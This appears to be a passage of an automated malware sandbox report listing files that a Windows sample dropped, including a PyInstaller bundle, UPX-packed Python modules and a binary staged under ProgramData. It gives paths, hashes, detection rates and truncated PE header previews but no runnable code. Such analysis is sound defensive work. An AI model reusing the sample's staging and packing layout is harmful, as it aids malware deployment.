MD5:	20C77203DDF9FF2FF96D6D11DEA2EDCF
SHA1:	0D660B8D1161E72C993C6E2AB0292A409F6379A5
SHA-256:	9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
SHA-512:	2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....\|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......\|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...\|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI26762\_hashlib.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64792
Entropy (8bit):	6.223467179037751
Encrypted:	false
SSDEEP:	1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
MD5:	D4674750C732F0DB4C4DD6A83A9124FE
SHA1:	FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
SHA-256:	CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
SHA-512:	97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI26762\_lzma.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	158488
Entropy (8bit):	6.8491143497239655
Encrypted:	false
SSDEEP:	3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
MD5:	7447EFD8D71E8A1929BE0FAC722B42DC
SHA1:	6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
SHA-256:	60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
SHA-512:	C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI26762\_socket.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	79128
Entropy (8bit):	6.284790077237953
Encrypted:	false
SSDEEP:	1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
MD5:	819166054FEC07EFCD1062F13C2147EE
SHA1:	93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
SHA-256:	E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
SHA-512:	DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	880569
Entropy (8bit):	5.682993312079324
Encrypted:	false
SSDEEP:	12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
MD5:	C4989BCEB9E7E83078812C9532BAEEA7
SHA1:	AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
SHA-256:	A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
SHA-512:	FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
Malicious:	false
Preview:	PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI26762\libcrypto-1_1.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3450648
Entropy (8bit):	6.098075450035195
Encrypted:	false
SSDEEP:	98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
MD5:	9D7A0C99256C50AFD5B0560BA2548930
SHA1:	76BD9F13597A46F5283AA35C30B53C21976D0824
SHA-256:	9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
SHA-512:	CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.\|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...\|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI26762\python310.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4458776
Entropy (8bit):	6.460390021076921
Encrypted:	false
SSDEEP:	49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
MD5:	63A1FA9259A35EAEAC04174CECB90048
SHA1:	0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
SHA-256:	14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
SHA-512:	896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.\|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6361390
Entropy (8bit):	7.989449982411625
Encrypted:	false
SSDEEP:	196608:S8JwSNEMZM/LUuL/VLdu4IDrrp9ECJqIrE:S4jEMeIqd6DrrDLJNE
MD5:	E5DB23B3AAF4DDDD2BAF96FB7BBA9616
SHA1:	B4479AB38BB534CE5BBF9C6F3C89305BDCFF2CF7
SHA-256:	93BDF29408BE9CF5C1880F897F91CD475824E46B929CD947F32B8808A5903958
SHA-512:	541436C704D8789DAD962841B985EB84C251F5FAC7AD93DD318BC91A2C29885947F8D35AC99C03B3C3D6EC81D03AD25E01F85406F8F86BF05BD2D30244CE51DB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI26762\select.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29976
Entropy (8bit):	6.627859470728624
Encrypted:	false
SSDEEP:	768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
MD5:	A653F35D05D2F6DEBC5D34DADDD3DFA1
SHA1:	1A2CEEC28EA44388F412420425665C3781AF2435
SHA-256:	DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
SHA-512:	5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI26762\unicodedata.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1123608
Entropy (8bit):	5.3853088605790385
Encrypted:	false
SSDEEP:	12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
MD5:	81D62AD36CBDDB4E57A91018F3C0816E
SHA1:	FE4A4FC35DF240B50DB22B35824E4826059A807B
SHA-256:	1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
SHA-512:	7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)\|.K(.eJ)..K(.eJ).eK).eJ)\|.G(.eJ)\|.J(.eJ)\|..).eJ)\|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17830453
Entropy (8bit):	7.99838673729773
Encrypted:	true
SSDEEP:	393216:ToNLbkNj0zztkKxXziCnbvCyHPSh5NzQSRAgS+aCBtd:TohLzht3nZHY59RRAP0d
MD5:	4FEC8FAF6590F62034AD44A54175B9E9
SHA1:	D7F0D639D943AEEE3F98442EEC744CA0E78A07D1
SHA-256:	68231C9B195A3987BC26BB9AF2543F49A04C1343BBB17982BC6302A21138E33A
SHA-512:	A6307FB6CED7699C4743235CBE31A8B3673F3D9FC2421AC455ECE7C3C0990A15AEFB20A78120D0FF62752B7E3D922056EE0212A13B85144C73B24507F9678B19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..6..6..6....V.6....T.'6....U.6..)MZ.6..)M..6..)M..6..)M..6..N$.6..N4.6..6..7..'M..6..'M..6..'MX.6..'M..6..Rich.6..................PE..L......e...............!.F..........P........`....@.......................................@.............................4.......P.......D....................p..\%......T...............................@............`..x....... ....................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data...XG... ......................@....didat.......p......................@....rsrc...D...........................@..@.reloc..\%...p...&..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI69202\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI69202\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	46064
Entropy (8bit):	7.796865894568779
Encrypted:	false
SSDEEP:	768:V3CnjEFEHH57WfWzAPpIe7zOsupVPW9zxtrXhcwKnXffpI3IvtVHeDYiSyv6RqeA:V6jEFO7WffITsMw9vrxcpnPq3IvtVHs9
MD5:	C24B301F99A05305AC06C35F7F50307F
SHA1:	0CEE6DE0EA38A4C8C02BF92644DB17E8FAA7093B
SHA-256:	C665F60B1663544FACF9A026F5A87C8445558D7794BAFF56E42E65671D5ADC24
SHA-512:	936D16FEA3569A32A9941D58263E951623F4927A853C01EE187364DF95CD246B3826E7B8423AC3C265965EE8E491275E908AC9E2D63F3ABC5F721ADD8E20F699
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>..m..m..m..=m..m...l..m..Sm..m...l..m...l..m...l..mf..l..mt..l..m..m..mf..l..mf..l..mf.Qm..mf..l..mRich..m........................PE..d....(.b.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI69202\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	105456
Entropy (8bit):	7.934837610567248
Encrypted:	false
SSDEEP:	1536:oLDiGfp+9JSNhsyzp72hnyE8E24ZllDUD1RPC/J3KPKu8URMIv5q5pM7SyqL:owcV0nyE32kvDUhRa1uHqIv5q5pMsL
MD5:	604154D16E9A3020B9AD3B6312F5479C
SHA1:	27C874B052D5E7F4182A4EAD6B0486E3D0FAF4DA
SHA-256:	3C7585E75FA1E8604D8C408F77995B30F90C54A0F2FF5021E14FA7F84E093FB6
SHA-512:	37CE86FD8165FC51EBE568D7CE4B5EA8C1598114558D9F74A748A07DC62A1CC5D50FE1448DDE6496EA13E45631E231221C15A64CEBBB18FA96E2F71C61BE0DB4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...V...V...V......V..W...V..S...V..R...V..U...V.a.W...V.s.W...V...W.;.V.a.U...V.a.[...V.a.V...V.a.....V.a.T...V.Rich..V.........PE..d...q(.b.........." .....p................................................... ............`.............................................P........................'......................................................8...........................................UPX0....................................UPX1.....p.......f..................@....rsrc................j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI69202\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	33264
Entropy (8bit):	7.645283646866556
Encrypted:	false
SSDEEP:	768:rzmfA5r8DJk6cG5pq+Iv5IiyYiSyvUqbIteE+K:rzmG8DJkV+Iv5Iiy7Syif
MD5:	8BA5202E2F3FB1274747AA2AE7C3F7BF
SHA1:	8D7DBA77A6413338EF84F0C4DDF929B727342C16
SHA-256:	0541A0028619AB827F961A994667F9A8F1A48C8B315F071242A69D1BD6AEAB8B
SHA-512:	D19322A1ABA0DA1AA68E24315CDBB10D63A5E3021B364B14974407DC3D25CD23DF4FF1875B12339FD4613E0F3DA9E5A78F1A0E54FFD8360ED764AF20C3ECBB49
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........SQ..2?..2?..2?..J...2?.G>..2?.G:..2?.G;..2?.G<..2?.+G>..2?.9@>..2?.jK>..2?..2>.l2?.+G2..2?.+G?..2?.+G...2?.+G=..2?.Rich.2?.........PE..d....(.b.........." .....P..........p/.......................................P............`..........................................K..P....I.......@.......................K......................................p;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI69202\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84976
Entropy (8bit):	7.919746609337062
Encrypted:	false
SSDEEP:	1536:fZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfo0Dm8wIve1M77Syi7:v7HdSpd+co4AhRiXT0DiIve1M7c7
MD5:	215ACC93E63FB03742911F785F8DE71A
SHA1:	D4E3B46DB5D4FCDD4F6B6874B060B32A4B676BF9
SHA-256:	FFDBE11C55010D33867317C0DC2D1BD69F8C07BDA0EA0D3841B54D4A04328F63
SHA-512:	9223A33E8235C566D280A169F52C819A83C3E6FA1F4B8127DDE6D4A1B7E940DF824CCAF8C0000EAC089091FDE6AE89F0322FE62E47328F07EA92C7705ACE4A72
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J..G.......A.......H.......K.......@......@......A...C...&......y......B......B......B...RichC...........................PE..d....(.b.........." ..... ................................................................`.........................................4...L....................@..........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI69202\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	40944
Entropy (8bit):	7.702142071966167
Encrypted:	false
SSDEEP:	768:5p4KUJsCditRTP+g7X1eloezpnmhclAka9TdTsGW9Vm0NpDrZIvQwHmAYiSyveDd:5pghditRD+gReloMpnmaydTjWfbrZIvY
MD5:	1F7E5E111207BC4439799EBF115E09ED
SHA1:	E8B643F19135C121E77774EF064C14A3A529DCA3
SHA-256:	179EBBE9FD241F89DF31D881D9F76358D82CEDEE1A8FB40215C630F94EB37C04
SHA-512:	7F8A767B3E17920ACFAAFD4A7ED19B22862D8DF5BDF4B50E0D53DFBF32E9F2A08F5CDE97ACECB8ABF8F10FBBEDB46C1D3A0B9EB168D11766246AFE9E23ADA6FD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Rv...............ok.....Db......Db......Db......Db.......b...............e.......b.......b.......b.......b......Rich............PE..d....(.b.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	879899
Entropy (8bit):	5.683242093964832
Encrypted:	false
SSDEEP:	12288:EEHYKmIBWSxC6SacYgCA4a2Y80dqVwxffpEo4pJSLMNmQ:EEHYI1x1La2jpVwxffpEo40MNmQ
MD5:	D9A88C1228ECC6BDEE15AB1D8250B9F1
SHA1:	DD8F8DDE1AB2E05AEBCE3CB0B99C0B380AA3592C
SHA-256:	9DB062EEFFE2028281730237AAFD9401C7AAD3ECC781905E9539F1FF41114989
SHA-512:	FA8189705E42AD08CE50225F4545A1FF8D24BCF2E026F2F66B1CABE8FF697F5DEEDBA31A8C93E5D6988AACC78A3CDD5F29D383E34F821EFADACFAD3299E0E408
Malicious:	false
Preview:	PK..........!..0.............._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI69202\libcrypto-1_1.dll

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1105816
Entropy (8bit):	7.937977313955466
Encrypted:	false
SSDEEP:	24576:Uk3UseOkUaIS1Ufk9yI9EBrXvkKTfropEOdo89kASpQY32Za1CPwDv3uFfJW:Uk3U0aIS1Uc9yoEZlTfMpE9lT1CPwDvX
MD5:	3CC020BACEAC3B73366002445731705A
SHA1:	6D332AB68DCA5C4094ED2EE3C91F8503D9522AC1
SHA-256:	D1AA265861D23A9B76F16906940D30F3A65C5D0597107ECB3D2E6D470B401BB8
SHA-512:	1D9B46D0331ED5B95DDA8734ABE3C0BD6F7FB1EC9A3269FEAB618D661A1644A0DC3BF8AC91778D5E45406D185965898FE87ABD3261A6F7F2968C43515A48562C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R.m.R.m.R.m.[...@.m.0.l.P.m.0.h.^.m.0.i.Z.m.0.n.V.m.R.l..m..l.Y.m...n.O.m...i.+.m...m.S.m....S.m...o.S.m.RichR.m.........................PE..d...`.0b.........." ..............&.`D5...&..................................p7...........`......................................... h5......c5.h....`5......p2.8............h7.....................................xP5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc........`5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI69202\python310.dll

Download File

Process:	C:\Users\user\Desktop\VaTlw2kNGc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1507312
Entropy (8bit):	7.992414868541998
Encrypted:	true
